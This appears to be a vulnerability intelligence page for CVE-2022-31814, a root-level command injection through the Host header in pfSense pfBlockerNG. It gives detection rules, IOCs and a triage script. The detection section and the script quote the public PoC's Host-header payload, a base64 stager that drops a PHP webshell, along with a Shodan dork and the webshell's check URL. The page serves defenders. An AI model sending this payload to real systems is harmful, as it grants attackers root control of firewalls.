CVE-2022-31814
Published: 2022-09-05
Priority: P1 (92) · critical 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 86.45% (99.7th percentile)
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netgate | pfblockerng | <= 2.1.4_26 | — |
| pfsense | pfblockerng | < 2.1.4_27 | 2.1.4_27 |
Detection & IOCs (extracted from sources)

Injected Host header command, as quoted from the public PoC:

```
' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '
```

Snort/Suricata rule (ET sid:2044629):

```
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/pfblockerng/www/index.php"; fast_pattern; http.host; content:"|2a 3b|"; startswith; reference:url,www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/; reference:cve,2022-31814; classtype:attempted-admin; sid:2044629; rev:1; metadata:affected_product IoT, attack_target Networking_Equipment, created_at 2023_03_15, cve CVE_2022_31814, deployment Perimeter, deployment Internal, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_15, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
```

Byte match: |2a 3b| (`*;`)
- The exploit sends a GET request to /pfblockerng/www/index.php with shell metacharacters (e.g. `' *; ... ;'`) injected into the HTTP Host header, giving unauthenticated RCE as root.
- The Snort/ET rule (sid 2044629) matches GET requests whose URI contains /pfblockerng/www/index.php and whose Host header starts with bytes 0x2a 0x3b, i.e. `*;` (star then semicolon, no space). Note the `startswith` anchor: the PoC command quoted above begins with a single quote and a space before `*;`, so verify against your own captures that the rule fires on the variant you expect, and for hunting consider a broader match on any shell metacharacter in Host for that URI.
- After successful exploitation a PHP webshell is dropped at /usr/local/www/system_advanced_control.php and driven through the GET parameter `c`. Presence of this file on a pfSense host is a strong indicator of compromise.
- A successful shell upload can be confirmed by checking for `uid=0(root) gid=0(wheel)` in the response to /system_advanced_control.php?c=id.
- The Nuclei template confirms exploitation by checking that the initial response body from /pfblockerng/www/index.php contains `GIF`, then verifying a DNS interaction via interactsh, i.e. an out-of-band callback from the command injected through the Host header.
- A Shodan dork identifies exposed pfSense instances that may be running pfBlockerNG: http.title:"pfSense - Login" with Server: nginx and Set-Cookie: PHPSESSID=.
- Only pfBlockerNG 2.1.4_26 and below are affected; 3.x is explicitly unaffected. Scope detection rules accordingly to avoid false positives on patched or 3.x installations.
- pfBlockerNG is not installed by default on pfSense; the attack surface exists only on systems where the package has been explicitly installed.
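The triage logic the bullets above describe, as an added example written for this page (it is not code from IHTeam, Emerging Threats, Nuclei or Netgate). It mirrors the ET rule's match (GET, the pfBlockerNG URI, Host starting with `*;`), adds a broader metacharacter check for Host values where `*;` is not at byte 0, decodes the PoC's base64 stager to recover the path of the dropped webshell, and applies the affected range from the table above (2.1.4_26 and below affected, 2.1.4_27 fixed, 3.x unaffected). The function names, the metacharacter set and the sample requests are constructed for the demo; the base64 string is the one quoted from the PoC.

```python
"""Triage helpers for CVE-2022-31814 (added example, not code from the page's sources).

Facts used, all from the entry above:
  * affected range: pfBlockerNG <= 2.1.4_26, fixed in 2.1.4_27, 3.x unaffected
  * ET sid:2044629 matches GET + URI containing /pfblockerng/www/index.php +
    Host header starting with 0x2a 0x3b ("*;")
  * the public PoC's Host value base64-encodes a PHP stager that fopen()s
    /usr/local/www/system_advanced_control.php for writing
Function names, METACHARS and the sample requests are constructed for the demo.
"""
import base64
import re
from typing import Optional

FIXED_VERSION = "2.1.4_27"
TARGET_URI = "/pfblockerng/www/index.php"

# Shell metacharacters that never belong in a legitimate Host header value (assumed set).
METACHARS = re.compile(r"""[;|&`$*'"]""")
# The PoC wraps its stager as: echo '<base64>' | python3.8 -m base64 -d | php
B64_RE = re.compile(r"echo\s+'([A-Za-z0-9+/=]+)'")
# Path the decoded stager opens for writing, i.e. where the webshell lands.
FOPEN_W_RE = re.compile(r'fopen\("([^"]+)"\s*,\s*"w"\)')


def parse_version(v: str) -> tuple:
    """'2.1.4_26' -> (2, 1, 4, 26). A missing FreeBSD port revision (_N) counts as 0."""
    base, _, rev = v.partition("_")
    return tuple(int(x) for x in base.split(".")) + (int(rev or 0),)


def is_affected(version: str) -> bool:
    """True for 2.1.4_26 and older; False for 2.1.4_27 and later and for any 3.x release."""
    parsed = parse_version(version)
    if parsed[0] >= 3:
        return False
    return parsed < parse_version(FIXED_VERSION)


def parse_request(raw: str) -> dict:
    """Minimal parser for an HTTP/1.x request head (request line plus headers)."""
    lines = raw.strip("\r\n").split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "headers": headers}


def matches_et_rule(req: dict) -> bool:
    """Mirror of ET sid:2044629: GET, URI contains the pfBlockerNG page, Host starts with '*;'."""
    host = req["headers"].get("host", "")
    return req["method"] == "GET" and TARGET_URI in req["uri"] and host.startswith("*;")


def suspicious_host(req: dict) -> bool:
    """Broader hunt: any shell metacharacter in Host on the pfBlockerNG URI, wherever it sits."""
    host = req["headers"].get("host", "")
    return TARGET_URI in req["uri"] and METACHARS.search(host) is not None


def extract_dropped_file(host_value: str) -> Optional[str]:
    """If Host carries the PoC's base64 stager, decode it and return the file it writes."""
    m = B64_RE.search(host_value)
    if not m:
        return None
    try:
        php = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    f = FOPEN_W_RE.search(php)
    return f.group(1) if f else None


def triage(raw_request: str) -> dict:
    """Run all three checks on one raw request and return the verdicts."""
    req = parse_request(raw_request)
    return {
        "et_rule": matches_et_rule(req),
        "metachar_host": suspicious_host(req),
        "dropped_file": extract_dropped_file(req["headers"].get("host", "")),
    }


# Base64 stager exactly as quoted from the PoC in the Detection & IOCs section.
PAYLOAD_B64 = "PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+"

# Constructed sample requests (not real captures).
SAMPLE_REQUESTS = {
    # Host begins with the exact bytes the ET rule anchors on.
    "et_form": "GET /pfblockerng/www/index.php HTTP/1.1\r\nHost: *; id;\r\nUser-Agent: curl/7.79.1\r\n\r\n",
    # Host in the shape of the PoC: a quote and a space precede "*;".
    "poc_form": ("GET /pfblockerng/www/index.php HTTP/1.1\r\n"
                 "Host: ' *; echo '" + PAYLOAD_B64 + "'|python3.8 -m base64 -d | php; '\r\n"
                 "Connection: close\r\n\r\n"),
    # Ordinary request for the same page.
    "benign": "GET /pfblockerng/www/index.php HTTP/1.1\r\nHost: fw.example.internal\r\n\r\n",
}

if __name__ == "__main__":
    for v in ("2.1.4_26", "2.1.4_27", "3.2.0_7"):
        print(f"pfBlockerNG {v}: affected={is_affected(v)}")
    for label, raw in SAMPLE_REQUESTS.items():
        print(label, triage(raw))
```

Run as a script to see the verdicts. The `poc_form` case is the point: the literal `startswith` mirror of the ET rule does not fire on a Host that begins with `' *;`, while the metacharacter check does, and the decoder recovers `/usr/local/www/system_advanced_control.php` as the file to look for on the firewall.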
CVSS provenance
- NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- VulnCheck: 9.8 CRITICAL
GHSA
GHSA-crg2-7qxv-74jh (ghsa_unreviewed · 2022-12-20 · CVSS 9.8)
CVE-2022-40624 [CRITICAL] CWE-78
pfSense pfBlockerNG through 2.1.4_27 allows remote attackers to execute arbitrary OS commands as root via the HTTP Host header, a different vulnerability than CVE-2022-31814.
Note: that range includes 2.1.4_27, the version that fixes this CVE, so a host patched for CVE-2022-31814 alone is still within the stated range for CVE-2022-40624.
GHSA
GHSA-hr8v-98c3-7p3x (ghsa_unreviewed · 2022-09-06)
CVE-2022-31814 [CRITICAL] CWE-78
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
VulnCheck
netgate pfblockerng: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (vulncheck · 2022 · CVSS 9.8)
CVE-2022-31814 [CRITICAL]
pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.
Affected: netgate pfblockerng
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2022-31814&date=2025-10-17; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2022-31814&date=2025-10-18; https://api.vulncheck.com/
Suricata
ET EXPLOIT pfBlockerNG HTTP Host Header Remote Code Execution Attempt (CVE-2022-31814) (suricata · 2023-03-15 · CVSS 9.8)
CVE-2022-31814 [CRITICAL]
Rule: sid:2044629, rev:1; the full rule text is reproduced under Detection & IOCs above.
Exploit-DB
pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE) (exploitdb · 2023-02-20 · CVSS 9.8)
CVE-2022-31814 [CRITICAL]
Header and opening lines of the Exploit-DB script; the indexed copy is cut off partway through its imports:

```python
# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureReques
```
Metasploit
pfSense plugin pfBlockerNG unauthenticated RCE as root (metasploit)
pfBlockerNG is a popular pfSense plugin that is not installed by default. It is generally used to block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.
Nuclei
pfSense pfBlockerNG <=2.1.4_26 - OS Command Injection (nuclei · CVSS 9.8)
CVE-2022-31814 [CRITICAL]
Template metadata as indexed (the description field is truncated in this copy; it ends "(>=2.1.4_27) to mitigate this vulnerability."):

```yaml
info:
  name: pfSense pfBlockerNG <=2.1.4_26 - OS Command Injection
  # description truncated in the indexed copy: "... (>=2.1.4_27) to mitigate this vulnerability."
  reference:
    - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
    - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
    - https://github.com/EvergreenCartoons/SenselessViolence
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31814
    - http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-31814
    cwe-id: CWE-78
    epss-score: 0.9436
    epss-percentile: 0.99962
    cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: netgate
    product: pfblockerng
    framework: pfsense
  tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oas
```
No writeups or analysis indexed.
References
- https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
- https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
- https://github.com/pfsense/FreeBSD-ports/pull/1169
- https://github.com/pfsense/FreeBSD-ports/pull/1169/commits/071bdcf2d918c3e51cde11cf81fbd9b6f0379d7e
- http://packetstormsecurity.com/files/168743/pfSense-pfBlockerNG-2.1.4_26-Shell-Upload.html
- http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html